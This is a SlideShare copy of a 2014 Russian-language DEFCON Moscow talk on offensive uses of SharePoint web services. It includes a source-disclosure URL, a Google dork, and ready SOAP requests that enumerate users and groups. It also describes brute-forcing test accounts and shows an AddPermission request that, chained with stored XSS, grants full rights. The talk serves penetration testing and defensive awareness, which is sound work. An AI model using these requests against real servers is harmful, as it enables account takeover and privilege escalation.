SlideShare a Scribd company logo
AUG 30, 2014
АЛЬТЕРНАТИВНОЕ ИСПОЛЬЗОВАНИЕ ВЭБ 
СЕРВИСОВ SHAREPOINT СО СТОРОНЫ 
ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ 
AUG 30, 2014 
By George Lagoda
PENTESTER 
VULNERABILITY RESEARCHER 
BUG HUNTER 
WHITEHAT 
DEFCON MOSCOW FOUNDER 
George Lagoda 
3
ЧТО ПРЕПАРИРУЕМ ? 
4
ОСНОВНЫЕ КОМПОНЕНТЫ SHAREPOINT 
5 
ВЕБ-ПРИЛОЖЕНИЯ для организации совместной работы 
ФУНКЦИОНАЛЬНОСТЬ для создания веб-порталов 
ПОИСК ИНФОРМАЦИИ в документах и информационных системах 
УПРАВЛЕНИЕ РАБОЧИМИ ПРОЦЕССАМИ и содержимым масштаба предприятия 
БИЗНЕС-АНАЛИЗ
6 
Google 
hacking 
ОБЩЕЕ ОПИСАНИЕ УЯЗВИМОСТЕЙ 
ЗАКРЫТЫЕ ДЕТАЛИ 
НЕБОЛЬШОЕ КОЛИЧЕСТВО ПУБЛИЧНЫХ ЭКСПЛОЙТОВ
УЯЗВИМОСТЬ 
ЗАГРУЗКИ 
ИСХОДНЫХ 
КОДОВ ASPX 
СТРАНИЦ 
7 
• Работает только в SharePoint 2007 
• Необходимо знать адрес конкретной страницы 
• Основной интерес представляют страницы написанные 
разработчиками сайта 
h-p://www.example.com/_layouts/download.aspx?SourceUrl=/Pages/ 
Default.aspx&Source=h-p://www.example.com/Pages/ 
Default.aspx&FldUrl=
ВЕБ-СЕРВИСЫ 
SHAREPOINT 
8 
GOOGLE HACK : “INURL: _VTI_BIN/SPSDISCO.ASPX”
ТОНКИЙ 
МОМЕНТ 
/_vG_bin/ 
9 
/_vG_bin/
СТАРЫЙ СПОСОБ 
ПЕРЕЧИСЛЕНИЯ 
ПОЛЬЗОВАТЕЛЕЙ 
10 
HTTPS://HOST/_LAYOUTS/USERDISP.ASPX?ID=1
НЕДОСТАТКИ 
СТАРОГО 
СПОСОБА 
11 
• Необходимо инкрементировать ID 
• Не всегда есть доступ к просмотру 
• Можно попасть в группу 
• Самый большой ID не известен 
• NTLM или Kerberos авторизация при автоматизации 
• Парсинг данных при автоматизации 
• Что делать если их “over 9000”?????
ОТ ТЕОРИИ К 
ПРАКТИКЕ 
POST /sites/testsite1/_vti_bin/UserGroup.asmx HTTP/1.1 
Host: host 
[…] 
<?xml version="1.0" encoding="utf-8"?> 
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> 
<soap:Body> 
<GetUserCollectionFromSite xmlns="http:// 
schemas.microsoft.com/sharepoint/soap/directory/" /> 
</soap:Body> 
</soap:Envelope> 
12
1133
8000+ 
пользователей 
одним запросом 
1144
GREP “TEST” 
МНОГО ДОМЕНОВ, МНОГО ПОЛЬЗОВАТЕЛЕЙ, МНОГО ВОЗМОЖНОСТЕЙ 
15
DUMMY BRUTE 
LEADS TO PWN 
• Захвачена тестовая доменная учетная запись 
• Повышена сложность обнаружения злоумышленника 
• Разные тестовые учетные записи могут содержать разные 
права доступа к сайту 
• Приведен пример из боевого проекта, получен аккаунт из 
домена крупного российского банка 
16
DEER HUNTING 
Для поиска интересного аккаунта помимо тестового 
перечисляем список групп и узнаем в какой группе 
находится наша “жертва” 
17
ПОЛУЧАЕМ 
СПИСОК ГРУПП 
POST /_vti_bin/UserGroup.asmx HTTP/1.1 
Host: host 
[…] 
<?xml version="1.0" encoding="utf-8"?> 
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> 
<soap:Body> 
<GetGroupCollectionFromSite xmlns="http:// 
schemas.microsoft.com/sharepoint/soap/directory/" /> 
</soap:Body> 
</soap:Envelope> 
18 
список групп на разных сайтах 
в рамках одного домена может 
различаться
1199
ИНТЕРЕСЕН ЛИ 
НАМ АККАУНТ? 
POST /_vti_bin/UserGroup.asmx HTTP/1.1 
Host: host 
[…] 
<?xml version="1.0" encoding="utf-8"?> 
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> 
<soap:Body> 
<GetGroupCollectionFromUser xmlns="http:// 
schemas.microsoft.com/sharepoint/soap/directory/"> 
<userLoginName>SHAREPOINTsystem</userLoginName> 
</GetGroupCollectionFromUser> 
</soap:Body> 
</soap:Envelope> 
20
2211
НАХОДИШЬ ХРАНИМЫЕ XSS НА ЛЮБОМ САЙТЕ? 
ИНТЕРЕСНО ЛИ КРАСТЬ АДМИНСКИЕ КУКИ? 
МОЖЕМ ЛИ МЫ ИХ УКРАСТЬ? 
ЗАЧЕМ КРАСТЬ СЕССИЮ АДМИНА, КОГДА 
МОЖНО СТАТЬ АДМИНОМ? 
22
/_vti_bin/ 
Permissions.asmx 
Сайт + хранимая XSS + XHR с одним из этих методов + 
CORS нам не мешает = разрешения админа ) 
23
ИГРАЕМ С 
РАЗРЕШЕНИЯМИ 
POST /_vti_bin/Permissions.asmx HTTP/1.1 
Host: host 
[…] 
<?xml version="1.0" encoding="utf-8"?> 
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http:// 
schemas.xmlsoap.org/soap/envelope/"> 
<soap:Body> 
<AddPermission xmlns="http://schemas.microsoft.com/sharepoint/soap/ 
directory/"> 
<objectName>testsite1</objectName> 
<objectType>web</objectType> 
<permissionIdentifier>i:0#.w|ra1d3ntest3</permissionIdentifier> 
<permissionType>User</permissionType> 
<permissionMask>-1</permissionMask> 
</AddPermission> 
</soap:Body> 
</soap:Envelope> 
24
THAT’S ALL FOLKS ;] 
@rox41Id3n 
By George Lagoda

More Related Content

PPT
Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТП
PPTX
Безопасность Joomla: мифы и реальность
PDF
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
PDF
Этичный хакинг
PDF
ХАРДЕНИНГ (Аринов Ильяс (determination))
PDF
The Atomic bomb for kiddies /exploring NSA exploits/
PDF
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
PDF
Linux for newbie hackers
Positive Hack Days. Гуркин. Угрозы безопасности АСУ ТП
Безопасность Joomla: мифы и реальность
Почему хакеры выбирают WordPress. WordCamp 2017, Moscow.
Этичный хакинг
ХАРДЕНИНГ (Аринов Ильяс (determination))
The Atomic bomb for kiddies /exploring NSA exploits/
Бекдоры в пхп. Остаться незамеченным или проникновение без боли
Linux for newbie hackers

What's hot (20)

PDF
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
PDF
Безопасность сайта: мифы и реальность — Петр Волков
PPTX
Под капотом Vulners
PDF
CodeFest 2012. Ивано и Пашук. — Интеграция корпоративных приложений. Пример в...
PPTX
Выступление Ревизиум на ХостОбзор 2017
PPTX
Целевые атаки: прицелься первым
PDF
Настройки индексации сайта
PPTX
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
PDF
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
PPT
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
PPT
Введение в тему безопасности веб-приложений
PDF
Антон Карпов - Сетевая безопасность
PPTX
#1 razvedka i sbor dannih
PPT
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПО
PPTX
PPTX
Безопасность вашего сайта Андрей Фуников
PPTX
Что надо знать о HTTP/2 Frontend разработчику
PPTX
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
PDF
2013 09 21 безопасность веб-приложений
PDF
После подключения DDoS-защиты: как "положат" Ваши ресурсы / Рамиль Хантимиров...
Application Security - ответы на ежедневные вопросы / Сергей Белов (Mail.Ru G...
Безопасность сайта: мифы и реальность — Петр Волков
Под капотом Vulners
CodeFest 2012. Ивано и Пашук. — Интеграция корпоративных приложений. Пример в...
Выступление Ревизиум на ХостОбзор 2017
Целевые атаки: прицелься первым
Настройки индексации сайта
Конфидент. Мардыко Евгений. "Особенности проектов по ИБ. Взгляд российского р...
Magic Box, или Как пришлось сломать банкоматы, чтобы их спасти
Доктор Веб. Иванов Дмитрий. "Антивирусная безопасность. Обеспечение защиты от...
Введение в тему безопасности веб-приложений
Антон Карпов - Сетевая безопасность
#1 razvedka i sbor dannih
Восток — дело тонкое, или Уязвимости медицинского и индустриального ПО
Безопасность вашего сайта Андрей Фуников
Что надо знать о HTTP/2 Frontend разработчику
История из жизни. Демонстрация работы реального злоумышленника на примере ата...
2013 09 21 безопасность веб-приложений
После подключения DDoS-защиты: как "положат" Ваши ресурсы / Рамиль Хантимиров...
Ad

Similar to George Lagoda - Альтернативное использование вэб сервисов SharePoint со стороны информационной безопасности (20)

PDF
7.2. Alternative sharepoint hacking
PDF
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
PDF
11 лекция, петр волков
PDF
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
PPT
Hivext 04.2010
PPT
Hivext – облачная платформа для быстрой разработки интернет приложений
PDF
НТБ. Сергей Шерстюк. "Система контроля привилегированных пользователей SafeI...
PPTX
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей Safe...
PPTX
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
PPTX
Новые возможности развертывания и масштабирования open source приложений в Az...
PPTX
Пост-эксплуатация веб-приложений в тестах на проникновение
PPSX
доктор веб медведев вячеслав год прошел как сон пустой или почему ничего не м...
PPT
Тестирование мобильных приложений
PPT
initiatives and instruments
PPTX
Каким будет SEO в начале 2017 года и как нам в этом поможет Wordpress?
PPT
Penetration testing (AS IS)
PPT
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
PPTX
Open source technologies in Microsoft cloud - MS SWIT 2014
PPT
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
DOC
PT MIFI Labxss
7.2. Alternative sharepoint hacking
Как защитить свой сайт, Пётр Волков, лекция в Школе вебмастеров
11 лекция, петр волков
«Вредоносные браузерные расширения и борьба с ними», Александра Сватикова (Од...
Hivext 04.2010
Hivext – облачная платформа для быстрой разработки интернет приложений
НТБ. Сергей Шерстюк. "Система контроля привилегированных пользователей SafeI...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей Safe...
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
Новые возможности развертывания и масштабирования open source приложений в Az...
Пост-эксплуатация веб-приложений в тестах на проникновение
доктор веб медведев вячеслав год прошел как сон пустой или почему ничего не м...
Тестирование мобильных приложений
initiatives and instruments
Каким будет SEO в начале 2017 года и как нам в этом поможет Wordpress?
Penetration testing (AS IS)
Н.Романов (Trend micro) - Скрытые угрозы: можно ли тайное сделать явным?
Open source technologies in Microsoft cloud - MS SWIT 2014
НТБ. Сергей Шерстюк. "Проблемы контроля привилегированных пользователей и их ...
PT MIFI Labxss
Ad

More from DefconRussia (20)

PPTX
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
PDF
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
PPTX
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
PDF
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
PDF
Георгий Зайцев - Reversing golang
PDF
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
PPTX
Cisco IOS shellcode: All-in-one
PPT
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
PPTX
HTTP HOST header attacks
PPTX
Attacks on tacacs - Алексей Тюрин
PPTX
Weakpass - defcon russia 23
PDF
nosymbols - defcon russia 20
PDF
static - defcon russia 20
PDF
Zn task - defcon russia 20
PDF
Vm ware fuzzing - defcon russia 20
PDF
Nedospasov defcon russia 23
PDF
Advanced cfg bypass on adobe flash player 18 defcon russia 23
PDF
Miasm defcon russia 23
PDF
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
PDF
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
Георгий Зайцев - Reversing golang
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
Cisco IOS shellcode: All-in-one
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
HTTP HOST header attacks
Attacks on tacacs - Алексей Тюрин
Weakpass - defcon russia 23
nosymbols - defcon russia 20
static - defcon russia 20
Zn task - defcon russia 20
Vm ware fuzzing - defcon russia 20
Nedospasov defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Miasm defcon russia 23
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях

George Lagoda - Альтернативное использование вэб сервисов SharePoint со стороны информационной безопасности

  • 2. АЛЬТЕРНАТИВНОЕ ИСПОЛЬЗОВАНИЕ ВЭБ СЕРВИСОВ SHAREPOINT СО СТОРОНЫ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ AUG 30, 2014 By George Lagoda
  • 3. PENTESTER VULNERABILITY RESEARCHER BUG HUNTER WHITEHAT DEFCON MOSCOW FOUNDER George Lagoda 3
  • 5. ОСНОВНЫЕ КОМПОНЕНТЫ SHAREPOINT 5 ВЕБ-ПРИЛОЖЕНИЯ для организации совместной работы ФУНКЦИОНАЛЬНОСТЬ для создания веб-порталов ПОИСК ИНФОРМАЦИИ в документах и информационных системах УПРАВЛЕНИЕ РАБОЧИМИ ПРОЦЕССАМИ и содержимым масштаба предприятия БИЗНЕС-АНАЛИЗ
  • 6. 6 Google hacking ОБЩЕЕ ОПИСАНИЕ УЯЗВИМОСТЕЙ ЗАКРЫТЫЕ ДЕТАЛИ НЕБОЛЬШОЕ КОЛИЧЕСТВО ПУБЛИЧНЫХ ЭКСПЛОЙТОВ
  • 7. УЯЗВИМОСТЬ ЗАГРУЗКИ ИСХОДНЫХ КОДОВ ASPX СТРАНИЦ 7 • Работает только в SharePoint 2007 • Необходимо знать адрес конкретной страницы • Основной интерес представляют страницы написанные разработчиками сайта h-p://www.example.com/_layouts/download.aspx?SourceUrl=/Pages/ Default.aspx&amp;Source=h-p://www.example.com/Pages/ Default.aspx&amp;FldUrl=
  • 8. ВЕБ-СЕРВИСЫ SHAREPOINT 8 GOOGLE HACK : “INURL: _VTI_BIN/SPSDISCO.ASPX”
  • 10. СТАРЫЙ СПОСОБ ПЕРЕЧИСЛЕНИЯ ПОЛЬЗОВАТЕЛЕЙ 10 HTTPS://HOST/_LAYOUTS/USERDISP.ASPX?ID=1
  • 11. НЕДОСТАТКИ СТАРОГО СПОСОБА 11 • Необходимо инкрементировать ID • Не всегда есть доступ к просмотру • Можно попасть в группу • Самый большой ID не известен • NTLM или Kerberos авторизация при автоматизации • Парсинг данных при автоматизации • Что делать если их “over 9000”?????
  • 12. ОТ ТЕОРИИ К ПРАКТИКЕ POST /sites/testsite1/_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetUserCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 12
  • 13. 1133
  • 15. GREP “TEST” МНОГО ДОМЕНОВ, МНОГО ПОЛЬЗОВАТЕЛЕЙ, МНОГО ВОЗМОЖНОСТЕЙ 15
  • 16. DUMMY BRUTE LEADS TO PWN • Захвачена тестовая доменная учетная запись • Повышена сложность обнаружения злоумышленника • Разные тестовые учетные записи могут содержать разные права доступа к сайту • Приведен пример из боевого проекта, получен аккаунт из домена крупного российского банка 16
  • 17. DEER HUNTING Для поиска интересного аккаунта помимо тестового перечисляем список групп и узнаем в какой группе находится наша “жертва” 17
  • 18. ПОЛУЧАЕМ СПИСОК ГРУПП POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromSite xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/" /> </soap:Body> </soap:Envelope> 18 список групп на разных сайтах в рамках одного домена может различаться
  • 19. 1199
  • 20. ИНТЕРЕСЕН ЛИ НАМ АККАУНТ? POST /_vti_bin/UserGroup.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetGroupCollectionFromUser xmlns="http:// schemas.microsoft.com/sharepoint/soap/directory/"> <userLoginName>SHAREPOINTsystem</userLoginName> </GetGroupCollectionFromUser> </soap:Body> </soap:Envelope> 20
  • 21. 2211
  • 22. НАХОДИШЬ ХРАНИМЫЕ XSS НА ЛЮБОМ САЙТЕ? ИНТЕРЕСНО ЛИ КРАСТЬ АДМИНСКИЕ КУКИ? МОЖЕМ ЛИ МЫ ИХ УКРАСТЬ? ЗАЧЕМ КРАСТЬ СЕССИЮ АДМИНА, КОГДА МОЖНО СТАТЬ АДМИНОМ? 22
  • 23. /_vti_bin/ Permissions.asmx Сайт + хранимая XSS + XHR с одним из этих методов + CORS нам не мешает = разрешения админа ) 23
  • 24. ИГРАЕМ С РАЗРЕШЕНИЯМИ POST /_vti_bin/Permissions.asmx HTTP/1.1 Host: host […] <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http:// schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <AddPermission xmlns="http://schemas.microsoft.com/sharepoint/soap/ directory/"> <objectName>testsite1</objectName> <objectType>web</objectType> <permissionIdentifier>i:0#.w|ra1d3ntest3</permissionIdentifier> <permissionType>User</permissionType> <permissionMask>-1</permissionMask> </AddPermission> </soap:Body> </soap:Envelope> 24
  • 25. THAT’S ALL FOLKS ;] @rox41Id3n By George Lagoda